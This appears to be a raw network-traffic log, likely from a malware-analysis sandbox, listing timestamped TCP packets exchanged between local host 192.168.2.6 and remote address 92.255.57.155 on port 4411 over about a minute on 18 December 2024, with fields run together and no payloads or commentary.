                                  Dec 18, 2024 08:16:44.893943071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:45.013390064 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.065224886 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.069823980 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:45.189368010 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.204642057 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.207453966 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:45.300256014 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.369302034 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.372129917 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:45.388130903 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.491714001 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:45.492026091 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:45.611629963 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:46.613255024 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:46.732786894 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:46.732845068 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:46.852313042 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:46.852443933 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:46.972013950 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:47.047441006 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:47.049892902 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:47.169593096 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:47.237899065 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:47.244128942 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:47.361006021 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:47.364181042 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:47.364366055 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:47.483818054 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:48.394608021 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:48.515975952 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:48.516066074 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:48.635566950 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:48.829766989 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:48.867348909 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:48.986829042 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:49.068331957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:49.070621014 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:49.177942991 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:49.190248966 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:49.190368891 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:49.309894085 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.019706011 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.139401913 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.139481068 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.259123087 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.259325981 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.378819942 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.379038095 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.452758074 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.453039885 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.498531103 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.498605013 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.572582960 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.578931093 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.661262035 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.661545992 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.763689995 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.781094074 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.781213045 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:50.900676966 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.954607964 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:50.959333897 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:51.078963995 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.081917048 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:51.188283920 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.201508999 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.201966047 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:51.270231009 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.273936033 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:51.321491957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.321655035 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:51.393852949 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.442038059 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.731575012 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:51.735444069 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:51.855041027 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:52.331882000 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:52.451456070 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:52.451575994 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:52.571063042 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:52.613082886 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:52.732712984 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:52.732825041 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:52.765459061 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:52.765532970 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.066006899 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.137437105 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.137525082 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.138079882 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.138802052 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.241338015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.241514921 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.257463932 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.267219067 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.360963106 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.361064911 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.376879930 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.525209904 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.525398016 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.552143097 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.644871950 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.644963026 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.764462948 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.847588062 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:53.967008114 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:53.988178015 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:54.107744932 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:54.377470970 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:54.391343117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:54.511233091 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:54.567651033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:54.616929054 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:54.736383915 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:55.381879091 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:55.501432896 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:55.861017942 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:55.862312078 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:55.981775999 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:55.981839895 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.101593971 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.101653099 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.221234083 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.221293926 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.340806961 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.410131931 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.460091114 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.460170031 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.530653954 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.530711889 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.584183931 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.651096106 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.785345078 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:56.901211977 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.905067921 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:56.909859896 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:57.032299995 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.087946892 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.089200974 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:57.208834887 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.208945036 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:57.223264933 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.369201899 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.369441986 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:57.490688086 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.553879976 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:57.673490047 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.863116026 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:57.982681036 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:57.988405943 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.044229984 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.044290066 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.108175039 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.108252048 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.163889885 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.163944006 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.228782892 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.283504009 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.296588898 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.298171043 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.461185932 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.461271048 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.580933094 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.724805117 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.726092100 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.772099018 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.845649958 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.845953941 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.915868998 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.918020964 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:58.967026949 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:58.969995022 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:59.089423895 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:59.106523991 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:59.107295990 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:59.269081116 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:59.816412926 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:59.935841084 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:59.935893059 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.055648088 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.055727005 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.175326109 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.175389051 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.254126072 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.254252911 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.294794083 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.294866085 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.373728991 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.373862028 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.414324045 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.444796085 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.444897890 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.541109085 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.541162968 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.564539909 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.564629078 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.565009117 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.635845900 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.635895014 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.684130907 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.684252977 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.755588055 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.849122047 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.852037907 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.875375032 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.971539021 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:00.971616983 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:00.994905949 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.066083908 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.137087107 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.137242079 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.162694931 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.256808996 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.256886959 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.282248974 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.378463984 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.417218924 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.417308092 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.448153019 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.536830902 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.537875891 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.567748070 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.639168978 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.642038107 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.701253891 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.703950882 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.727952957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.761509895 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.823520899 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:01.823599100 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:01.943276882 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.285128117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.404629946 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.426743984 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.546360970 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.546433926 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.667077065 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.667144060 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.719202042 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.719283104 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.786550999 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.786604881 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.838804007 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.838934898 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:02.906122923 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.952184916 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.958662033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:02.961973906 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:03.029983997 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:03.081576109 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:03.082052946 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:03.143230915 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:03.201667070 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:03.201777935 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:31.081634998 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:31.081708908 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:31.081789970 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:31.201256990 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.082063913 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.202577114 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.202630997 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.323210955 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.323307037 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.443634033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.443731070 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.515388012 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.515640974 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.563364983 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.563436031 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.635104895 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.635158062 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.683398008 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.683490992 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.706362963 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.800889015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.800964117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.803011894 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.826183081 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.881973028 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.897453070 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.897617102 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:32.960942984 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:32.961062908 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.017190933 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.017294884 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.066039085 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.120892048 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.122026920 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.208457947 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.241591930 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.241745949 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.272083998 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.277946949 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.397531033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.399990082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.432768106 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.561038971 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.565993071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:33.685611963 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:33.941483974 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.061311960 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.175981045 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.296753883 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.296822071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.375448942 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.417519093 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.417678118 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.537194967 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.610543966 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.611421108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.730875015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.730937004 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.800415993 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.800549984 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.850389957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.850455999 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.920213938 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:34.921598911 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:34.922034979 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.012904882 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.014158010 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.041065931 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.133980036 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.215702057 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.216700077 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.336289883 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.406915903 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.408863068 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.528666973 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.529881001 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.530013084 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.654040098 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.657021999 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.721986055 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.777991056 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:35.782027960 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:35.902004957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.007975101 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.066042900 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.105385065 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.198606014 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.225095034 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.225136995 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.344593048 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.754378080 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.874064922 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:36.878948927 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:36.998756886 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.037957907 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.157867908 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.158025980 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.188411951 CET44114973992.255.57.155192.168.2.6
